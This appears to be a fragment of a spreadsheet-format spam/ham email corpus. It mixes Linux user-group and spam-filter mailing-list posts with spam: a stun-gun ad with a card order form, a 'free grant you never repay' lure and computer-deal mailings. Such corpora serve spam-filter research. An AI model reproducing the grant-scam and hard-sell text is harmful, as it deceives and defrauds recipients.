                              ^^^^^^
 Nice how NT "repair"s a hard disk by removing other OSs.  Could we call it
 that on Linux install disks too?
 Conor 
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
   5:37pm  up 69 days,  2:54,  0 users,  load average: 0.08, 0.02, 0.01
 Hobbiton.cod.ie
   5:22pm  up 12 days, 0 min,  1 user,  load average: 0.03, 0.03, 0.00
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Real Protection, Stun Guns!  Free Shipping! Time:2:01:35 PM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font color="blue"&gt;
 &lt;b&gt;
 The Need For Safety Is Real In 2002, You Might Only Get One Chance - Be Ready!
 &lt;p&gt;
 Free Shipping &amp; Handling Within The (USA) If You Order Before May 25, 2002! 
 &lt;p&gt;
 3 Day Super Sale, Now Until May 7, 2002!  Save Up To $30.00 On Some Items!
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/h3&gt;
 &lt;/center&gt;
 &lt;p&gt;
 IT'S GETTING TO BE SPRING AGAIN, PROTECT YOURSELF AS YOU WALK,&lt;br&gt;
 JOG AND EXERCISE OUTSIDE.  ALSO PROTECT YOUR LOVED ONES AS&lt;br&gt;
 THEY RETURN HOME FROM COLLEGE!&lt;br&gt;
 &lt;p&gt;
 *     LEGAL PROTECTION FOR COLLEGE STUDENTS!&lt;br&gt;
 *     GREAT UP'COMING OUTDOOR PROTECTION GIFTS!&lt;br&gt;
 *     THERE IS NOTHING WORTH MORE PROTECTING THAN LIFE!&lt;br&gt;
 *     OUR STUN DEVICES &amp; PEPPER PRODUCTS ARE LEGAL PROTECTION!
 &lt;p&gt;
 &lt;b&gt;
 &lt;font color="red"&gt;
 JOIN THE WAR ON CRIME!
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;p&gt;
 STUN GUNS AND BATONS 
 &lt;p&gt;
 EFFECTIVE - SAFE - NONLETHAL
 &lt;p&gt;
 PROTECT YOUR LOVED ONES AND YOURSELF
 &lt;p&gt;
 No matter who you are, no matter what City or Town you live in,&lt;br&gt;
 if you live in America, you will be touched by crime.
 &lt;p&gt;
 You hear about it on TV.  You read about it in the newspaper.&lt;br&gt;
 It's no secret that crime is a major problem in the U.S. today.&lt;br&gt;
 Criminals are finding it easier to commit crimes all the time.
 &lt;p&gt;
 Weapons are readily available.  Our cities' police forces have&lt;br&gt;
 more work than they can handle.  Even if these criminal are&lt;br&gt;
 caught, they won't be spending long in our nation's overcrowded&lt;br&gt;
 jails.  And while lawmakers are well aware of the crime problem,&lt;br&gt;
 they don't seem to have any effective answers.
 &lt;p&gt;
 Our Email Address:  &lt;a
 href="mailto:Merchants4all@aol.com"&gt;Merchants4all@aol.com&lt;/a&gt;
 &lt;p&gt;
 INTERESTED:
 &lt;p&gt;
 You will be protecting yourself within 7 days!  Don't Wait,&lt;br&gt;
 visit our web page below, and join The War On Crime!
 &lt;p&gt;
 *****************&lt;br&gt;
 &lt;a
 href="http://www.geocities.com/realprotection_20022003/"&gt;http://www.geocities.com/realprotection_20022003/&lt;/a&gt;&lt;br&gt;
 *****************
 &lt;p&gt;
 Well, there is an effective answer.  Take responsibility for&lt;br&gt;
 your own security.  Our site has a variety of quality personal&lt;br&gt;
 security products.  Visit our site, choose the personal security&lt;br&gt;
 products that are right for you.  Use them, and join the war on
 crime!
 &lt;p&gt;
 FREE PEPPER SPRAY WITH ANY STUN UNIT PURCHASE.&lt;br&gt;
 (A Value of $15.95)
 &lt;p&gt;
 We Ship Orders Within 5 To 7 Days, To Every State In The U.S.A.&lt;br&gt;
 by UPS, FEDEX, or U.S. POSTAL SERVICE.  Visa, MasterCard, American&lt;br&gt;
 Express &amp; Debt Card Gladly Accepted.
 &lt;p&gt;
 Ask yourself this question, if you don't help your loved ones,
 who will?
 &lt;p&gt;
 INTERESTED:
 &lt;p&gt;
 *****************&lt;br&gt;
 &lt;a
 href="http://www.geocities.com/realprotection_20022003/"&gt;http://www.geocities.com/realprotection_20022003/&lt;/a&gt;&lt;br&gt;
 *****************
 &lt;p&gt;
 ___The Stun Monster 625,000 Volts ($86.95)&lt;br&gt;
 ___The Z-Force Slim Style 300,000 Volts ($64.95)&lt;br&gt;
 ___The StunMaster 300,000 Volts Straight ($59.95)&lt;br&gt;
 ___The StunMaster 300,000 Volts Curb ($59.95)&lt;br&gt;
 ___The StunMaster 200,000 Volts Straight ($49.95)&lt;br&gt;
 ___The StunMaster 200,000 Volts Curb ($49.95)&lt;br&gt;
 ___The StunBaton 500,000 Volts ($89.95)&lt;br&gt;
 ___The StunBaton 300,000 Volts ($79.95)&lt;br&gt;
 ___Pen Knife (One $12.50, Two Or More $9.00)&lt;br&gt;
 ___Wildfire Pepper Spray  (One $15.95, Two Or More $11.75)
 &lt;p&gt;
 ___Add $5.75 For Shipping &amp; Handling Charge.
 &lt;p&gt;
 To Order by postal mail, please send to the below address.&lt;br&gt;
 Make payable to Mega Safety Technology.
 &lt;p&gt;
 Mega Safety Technology&lt;br&gt;
 3215 Merrimac Ave.&lt;br&gt;
 Dayton, Ohio  45405&lt;br&gt;
 Our Email Address:  &lt;a
 href="mailto:Merchants4all@aol.com"&gt;Merchants4all@aol.com&lt;/a&gt;
 &lt;p&gt;
 Order by 24 Hour Fax!!!  775-257-6657.
 &lt;p&gt;
 *****&lt;br&gt;
 &lt;b&gt;&lt;font color="red"&gt;Important Credit Card Information! Please Read Below!&lt;/b&gt;&lt;/font&gt;
  &lt;br&gt;&lt;br&gt;
 *     Credit Card Address, City, State and Zip Code, must match
       billing address to be processed. 
 &lt;br&gt;&lt;br&gt;
 CHECK____  MONEYORDER____  VISA____ MASTERCARD____ AmericanExpress___
 Debt Card___
 &lt;br&gt;&lt;br&gt;
 Name_______________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 Address____________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 City,State,Zip(As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Country
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 (Credit Card Number)
 &lt;br&gt;&lt;br&gt;
 Expiration Month_____  Year_____
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Authorized Signature
 &lt;br&gt;&lt;br&gt;
 &lt;b&gt;
 *****IMPORTANT NOTE*****
 &lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 If Shipping Address Is Different From The Billing Address Above,
 Please Fill Out Information Below.
 &lt;br&gt;&lt;br&gt;
 Shipping Name______________________________________________
 &lt;br&gt;&lt;br&gt;
 Shipping Address___________________________________________
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Shipping City,State,Zip
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Country
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Email Address &amp; Phone Number(Please Write Neat)
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] When is a wav not a wav?
</t>
  </si>
  <si>
    <t xml:space="preserve">I've got some really interesting wav files here.
 A friend had a Windows CD with, wait for it . . .
 Every Beatles Record ever released in the U.K.! Including the Christmas and 
 BBC special albums! All on one, ordinary CD! Yes a 650M CD!
 Of course this CD also had a special Windows app for playing this collection!
 I had a look at the contents of the CD, since I don't do Windows, and the 
 albums appeared to be plain wav files? Each album in it's own wav file, 25 
 Albums, 25 wav files?!? I copied the wav files to my hard drive. 
 Curious thing, though, noatun crashes on some of the larger ones, seems to 
 attempt to load the entire file into memory first, and on the ones it doesn't 
 crash on, it plays them fast and noisily? kwave refuses to recognise them 
 completely and wavp just makes an ungodly noise!
 xanim can, and does play them correctly though. Unfortunately xanim does not 
 have any position control so you just have to listen to the album from start 
 to finish.
 file has this to say about them:
 johngay@debian:/home/jgay$ file beatles/SGT.WAV
 beatles/SGT.WAV: RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, 
 stereo 22050 Hz
 johngay@debian:/home/jgay$ ls -l beatles/SGT.WAV
 -r-xr-xr-x    1 johngay  johngay  53334900 Sep 27  2001 beatles/SGT.WAV
 And this is SGT Pepper's lonely Hearts Club Band album. 51M is quite good, 
 considering it also has the inner track. But they certainly are NOT in stereo.
 What I would like to do is split up the tracks and convert them the mp3 for 
 xmms. I'm jsut not sure what tools would be able to handle these strange 
 compressed wav's that only xanim seems to recognise? I like the albums, but 
 would prefer to be able to sellect tracks to play rather than entire albums 
 and be able to listen to all my music with one app. I know xmms has a WAV 
 plugin, but it does not recognise these either.
 Any help will be greatly appreciated!
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Increase sexual energy - Reduce body fat!16548
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Grant request.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;META charset=3DUTF-8&gt;&lt;/HEAD&gt;
 &lt;BODY background=3D""&gt;&lt;FONT color=3D#000000 face=3DArial&gt;
 &lt;TABLE border=3D1 borderColorDark=3D#e0e0e0 cellPadding=3D1 cellSpacing=3D=
 0 frame=3Dbox rules=3Dgroups 
 style=3D"BACKGROUND-COLOR:#e0e0e0; FONT-SIZE: x-small" width=3D"100%"&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#e0e0e0 color=3D"#000000"&gt;
 &lt;TR align=3Dleft bgColor=3D#e0e0e0 color=3D"#000000"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;/STYLE&gt;
 &lt;META content=3D"MSHTML 5.50.4807.2300" name=3DGENERATOR&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;TABLE bgColor=3D#0033ff cellPadding=3D0 cellSpacing=3D3 width=3D652&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE bgColor=3D#71a5cc cellPadding=3D0 cellSpacing=3D0 width=3D646&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#71a5cc&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align=3Dmiddle bgColor=3D#71a5cc&gt;&lt;FONT color=3Dwhite face=3Darial,helv=
 etica&gt;&lt;B&gt;
 &lt;font size=3D"5"&gt;
 &lt;BR&gt;Your application for the Grant is below. &lt;BR&gt; &lt;BR&gt;Remember, because of=
  the type of Grant this is,&lt;BR&gt; you will never need to repay!&lt;BR&gt;&lt;/B&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#71a5cc&gt;&lt;BR&gt;
 &lt;UL&gt;&lt;FONT color=3Dwhite face=3Darial,helvetica&gt;
 &lt;font size=3D"5"&gt;
 &lt;center&gt;&lt;font color=3D"red"&gt;&gt;&gt;
 &lt;font color=3D"yellow"&gt;
 Time is limited. &lt;font color=3D"red"&gt;&lt;&lt;&lt;br&gt; &lt;FONT color=3Dwhite face=3Dari=
 al,helvetica&gt;
 &lt;font size=3D"4"&gt;You must place your order by&lt;font size=3D"5"&gt;&lt;font color=3D=
 "yellow"&gt; Midnight, Saturday July 27, 2002&lt;font size=3D"4"&gt; &lt;br&gt;&lt;FONT colo=
 r=3Dwhite face=3Darial,helvetica&gt;
 in order to secure a place in these programs.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;/center&gt;
  Too many people can qualify for this program, so by limiting the initial =
 applicants&lt;br&gt;
  to the most serious,  sincere and honest individuals. It will ensure that=
  the &lt;br&gt;
 program money is used for beneficial, constructive uses. &lt;br&gt;
  Remember there is &lt;b&gt;no risk&lt;/b&gt; on your part.&lt;br&gt;
 Also, each Grant is usually a &lt;b&gt;minimum of $10,000,&lt;/b&gt; so this is a grea=
 t opportunity!&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;a href=3D"http://www.freehostchina.com/grant/web2pleasure/index.html"&gt;
 SEE IF YOU ARE ELIGIBLE FOR A LARGER GRANT!&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/center&gt;
 &lt;br&gt; If you do not qualify for the Free Grant Program, &lt;b&gt;you lose nothing=
 !&lt;/b&gt;&lt;br&gt;
 But if you don't even apply, you lose EVERYTHING! &lt;br&gt;Remember,
  not everyone gets this opportunity, &lt;br&gt;
 and you get to be one of the first people to apply! &lt;br&gt;
 So your chances are so much higher!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;FONT SIZE=3D"6"&gt;
 &lt;center&gt;
 &lt;a href=3D"http://www.freehostchina.com/grant/web2pleasure/index.html"&gt;
 APPLY NOW! &lt;FONT SIZE=3D"5"&gt;&lt;br&gt;
 Deadline is almost here!&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/center&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; 
 &lt;DIV align=3Dcenter&gt;&lt;/DIV&gt;&lt;/A&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;DIV align=3Dcenter&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt; 
 &lt;/BODY&gt; &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] geek cuisine...
</t>
  </si>
  <si>
    <t xml:space="preserve">hm, looks good:
 http://books.slashdot.org/article.pl?sid=02/07/19/1411209&amp;mode=thread&amp;tid=134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Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I think that when considering deployment, a solution that supports all
 Python platforms and not just the L|Unix crowd is desirable.
 Mac and PC users are more apt to be using a commercial MUA that's unlikely
 to offer hooking ability (at least not easily). As mentioned elsewhere, even
 L|Unix users may find an MUA solution easier to use then getting it added to
 their MTA. (SysOps make programmers look like flaming liberals ;).)
 My notion of a solution for Windows/Outlook has been, as Guido described, a
 client-server. Client side does pop3/imap/mapi fetching (of which, I'm only
 going to implement pop3 initially) potentially on several hosts, spamhams
 the incoming mail and puts it into one file per message (qmail style?). The
 MUA accesses this "eThunk" as a server to obtain all the ham. Spam is
 retained in the eThunk and a simple viewer would be used for manual
 oversight on the spam for ultimate rejection (and training of spam filter)
 and the ham will go forward (after being used for training) on the next MUA
 fetch. eThunk would sit on a timer for 'always online' users, but I am not
 clear on how to support dialup users with this scheme.
 Outbound mail would use a direct path from the MUA to the MTA. Hopefully all
 MUAs can split the host fetch/send URL's
 IMO, end users are likely to be more intested in n-way classification. If
 this is available, the "simple viewer" could be enhanced to support viewing
 via folders and (at least for me) the Outlook nightmare is over - I would
 use this as my only MUA. (N.B. according to my recent readings, the best
 n-way classifier uses something called a "Support Vector Machine" (SVM)
 which is 5-8% more accurate then Naive Bayes (NB) ).
 I wonder if the focus of spambayes ought not to be a classifier that leaves
 the fetching and feeding of messages to auxillary code? That way, it could
 be dropped into whatever harness that suited the user's situation.
 David LeBlanc
 Seattle, WA USA
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Oh yeh one more thing.  None of this would explain why the signatures
 for sample-spam.txt from spamassassin is registered on honor but not apt
 or fire.
 -----Original Message-----
 From: Rose, Bobby 
 Sent: Thursday, August 08, 2002 9:54 AM
 To: mail@vipul.net; razor-users@example.sourceforge.net
 Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 Thanks that helps.  There's still so little info on TES and those of us
 here since RazorV1 know how it works.  I did set my min_cf to "ac-100"
 which I thought would be zero.  
 So the way you are suggesting that it works now is that everyone has a
 trust level of 1 and have to work their way up.  Your trust level
 increases when someone nominates the same message as spam. This must
 have been the new changes made at the beginning of the week unless the
 changes dumped everyone's trust level.  Now here come the questions...
 What engine signature does TES look at?  Does it have to be the same e1
 signature or does it use the e2 or e4 signatures.  How many people have
 to nominate the message before everyones rating increases?  How many
 revokes decreases someones rating?  Does a single revoke decrease the
 rating of everyone that nominated the message?  If a newby reports a
 message that has already been reported does their trust level
 immediately go up?  In the case of revoking, does someone with a trust
 level of 1 have the capability to revoke a message submitted by multiple
 people with higher trust levels?
 -----Original Message-----
 From: Vipul Ved Prakash [mailto:mail@vipul.net] 
 Sent: Thursday, August 08, 2002 4:22 AM
 To: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] What's wrong with the Razor servers now?
 Bobby, 
 Couple of things: 
 If you are not a trusted reporter, your reports will not have an
 immediate effect. It takes a bunch of trusted reporters to bump up the
 confidence of a signature to a point where it is considered to be spam.
 This might be frustrating initially, but as the number of trusted users
 grows the time delay between nominations and determination will become
 shorter. Of course, it's a lot more frustating for people to have their
 legit mail filtered out due to incorrect reporting.
 Also, for the purpose of testing, I'd suggest making your min_cf (in
 razor-agents.conf) to 0. min_cf defaults to the server recommended
 average confidence, which at the moment is 1. Setting min_cf to 0 should
 return true for whatever you submit (as long as it was not revoked by a
 trusted user).
 apt/fire sync with honor every 5 minutes, so you'd have to wait for a
 _maximum_ of 5 minutes before signatures propagate.
 cheers,
 vipul.
 On Wed, Aug 07, 2002 at 11:51:21PM -0400, Rose, Bobby wrote:
 &gt; This is still happening.  Nothing that I report is being registered at
 &gt; all.  I have confirmed that this also affects the Cloudmark Outlook
 &gt; plugin. If I block a message from Outlook using Spamnet then run it 
 &gt; against the folder containing the message that was reported then 
 &gt; nothing happens.
 &gt; 
 &gt; On the unix side, I've tried different cloudmark servers, different
 &gt; identies, report from different systems, etc without an effect.  I did
 &gt; find that sample-spam.txt from Spamassassin is only registered on
 &gt; honor.cloudmark.net and comes back positive from it and it only so 
 &gt; it's clearly not sync'd with apt or fire.
 &gt; 
 &gt; 
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Rose, Bobby
 &gt; Sent: Wednesday, August 07, 2002 1:32 PM
 &gt; To: Patrick
 &gt; Cc: ML-razor-users
 &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; I'm sure others have thought of that.  Probably the only way to
 &gt; prevent that is to include the host in the report/revoke 
 &gt; authentication.
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Patrick [mailto:patrick@stealthgeeks.net]
 &gt; Sent: Wednesday, August 07, 2002 12:33 PM
 &gt; To: Rose, Bobby
 &gt; Cc: ML-razor-users
 &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; On Wed, 7 Aug 2002, Rose, Bobby wrote:
 &gt; 
 &gt; &gt; Well at least it's been confirmed. I can say for cetain that it
 &gt; &gt; started on Monday since that was when I noticed a huge drop in stats
 &gt; of messages
 &gt; &gt; that were tagged as being in razor.   And I know it was fine on
 &gt; Friday.
 &gt; &gt; It may have something to do with the upgrades on the servers that
 &gt; &gt; Vipul mentioned.  If TES is going to decide on what gets registered 
 &gt; &gt; and what doesn't then razor-report should provide some debug info 
 &gt; &gt; about the refusal.  You are correct about the need for more info on 
 &gt; &gt; TES, but it probably won't happen for fear of circumvention.
 &gt; 
 &gt; &lt;INSERT RANT REGARDING SECURITY THROUGH OBSCURITY&gt;
 &gt; 
 &gt; On the way into work I thought of some fairly easy ways to circumvent
 &gt; what I imagine the current trust model to be based on individual users
 &gt; blindly submitting reports and checking results.
 &gt; 
 &gt; It's hard to imagine others haven't as well, as I'm not too bright.
 &gt; 
 &gt; 
 &gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
 &gt; /\
 &gt; /\/\/\
 &gt;                                Patrick Greenwell
 &gt;          Asking the wrong questions is the leading cause of wrong 
 &gt; answers
 &gt;
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 &gt; \/\/\/
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net 
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: kitty wants to play "eat your head"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=59390
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=59390
</t>
  </si>
  <si>
    <t xml:space="preserve">Probably because we have this pesky 1st Amendment thing here. Still, 
 lots of us in the States have developed a disturbing tendency to shout 
 down or (in recent years) shackle in legal BS opinions, thoughts, and 
 individual behaviors we don't agree with.
 You can just ignore it if you wish. But I must feel obligated to defend 
 to the death your right to do so.
 Chuck
 On Monday, September 16, 2002, at 06:54 AM, Robert Harley wrote:
 The usual crud.  Why do morons ranting and beating their chests in the
 National Review (or similar rags) merit FoRKing?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Amazing Trade Computer Deals
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Please take time to look at our newly designed website : www.microfinder.com
 We have a full range of Notebooks, Desktops and Accessories displayed on
 the site.
 If you are looking for trade prices feel free to subscribe to the trade
 section.
 Here are some of our latest specials :
 Notebooks :
 8 x Famous Brand A430, PIII650mhz, 128MB RAM, 6GB HDD, 13.3" TFT Screen,
 56K Modem,
 CD Rom, FDD, USB
 1 @ 525 + vat, 5 @ 495
 5 x Dell CPX H500GT, PIII500mhz, 128MB, 12GB HDD, 14.1" TFT, CDRom, FDD, USB
 1 @ 480 + vat, 5 @ 455 + vat
 DELL CDRW Available 75 extra
 10 x IBM Thinkpad 380 XD, P233mmx, 32MB, 4GB, 12.1" TFT, CDRom, FDD, USB,
 (New Battery!)
 1 @ 325 + vat, 5 @ 299 + vat
 10 x Digital Hi Note VP 735, P233mmx, 64MB, 3GB HDD, 13.3" TFT, CDRom,
 FDD, USB
 (Free Carry Case)
 1 @ 300 + vat, 5 @ 275 + vat
 20 x Low End Notebooks, P133, 32MB, 1.5GB, TFT and Dual Scan, FDD
 &gt;&gt;From 125 + vat
 Desktops :
 20 x Packard Bell Imedia 4600, Celeron 850mhz, 128MB Ram, 20GB HDD, DVD
 Rom, FDD, USB
 12 Months Warranty
 1 @ 320+vat, 5 @ 299 + vat
 Other Imedias in stock - call for prices 
 30 x Packard Bell Aur@, TFT Screen and Slim line Base Unit Designer PC,
 PIII933mhz, 128 MB Ram, 30GB HDD, DVD, CDRW, PCMCIA, USB, 15" TFT Screen
 5 @ 550 + vat
 Call Ali or Tris
 Sales and Marketing
 Microfinder UK Ltd. 
 Tel : 01225 447227
 Fax : 01225 471166
 106 Walcot St
 Bath
 BA1 5BG
 To be removed from this e-mail shot, please reply stating remove in the
 subject field.   
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] find the biggest file
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,all:
 Does anyone know how to list the biggest file in my
 root directory?or the second biggest ..etc...
 Because I want to find out what is the reason cause my
 root all most full.
 The system is Solaris 8 Sparc.
 Thanks !!!
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Finance - Get real-time stock quotes
 http://finance.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; Note that header names are case insensitive, so this one's no
 &gt; &gt; different than "MIME-Version:".  Similarly other headers in your list.
 &gt; 
 &gt; Ignoring case here may or may not help; that's for experiment to decide.
 &gt; It's plausible that case is significant, if, e.g., a particular spam mailing
 &gt; package generates unusual case, or a particular clueless spammer
 &gt; misconfigures his package.
 I found it made no difference for my testing.
 &gt; The brilliance of Anthony's "just count them" scheme is that it requires no
 &gt; thought, so can't be fooled &lt;wink&gt;.  Header lines that are evenly
 &gt; distributed across spam and ham will turn out to be worthless indicators
 &gt; (prob near 0.5), so do no harm.
 zactly. I started off doing clever clever things, and, as always with
 this stuff, found that stupid with a rock beats smart with scissors,
 every time.
 -- 
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;   
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: _Melhore sua segurana_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;meta name="Author" content="Ricardo"&gt;
    &lt;meta name="GENERATOR" content="Mozilla/4.51 [pt] (Win98; I) [Netscape]"&gt;
    &lt;title&gt;Ricardo&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text="#000000" bgcolor="#FFFFCC" link="#000099" vlink="#3366FF" alink="#FF0000"&gt;
 &lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Ol&amp;aacute;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Trabalho
 divulgando empresas s&amp;eacute;rias e competentes&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;que podem lhe oferecer
 excelentes oportunidades.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Caso
 n&amp;atilde;o seja de seu interesse solicito que exclua&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;este e-mail ou se poss&amp;iacute;vel
 o repasse para seus amigos.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Muito
 obrigado pela ajuda e compreens&amp;atilde;o&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Atenciosamente...&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Courier New,Courier"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Ricardo
 L. Kampf.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr WIDTH="100%"&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#3333FF"&gt;&lt;font size=+1&gt;Proteja
 seu patrim&amp;ocirc;nio sem gastar uma fortuna&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;table BORDER &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;Camera Falsa M01&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;img SRC="http://www.seg1000.hpg.com.br/p3.jpg" &gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;R$ 36,00&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;frete incluso&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;Para
 ver outros modelos ou obter mais&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;&lt;a href="http://www.garcia.clic3.net"&gt;detalhes
 clique aqui.&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;center&gt;
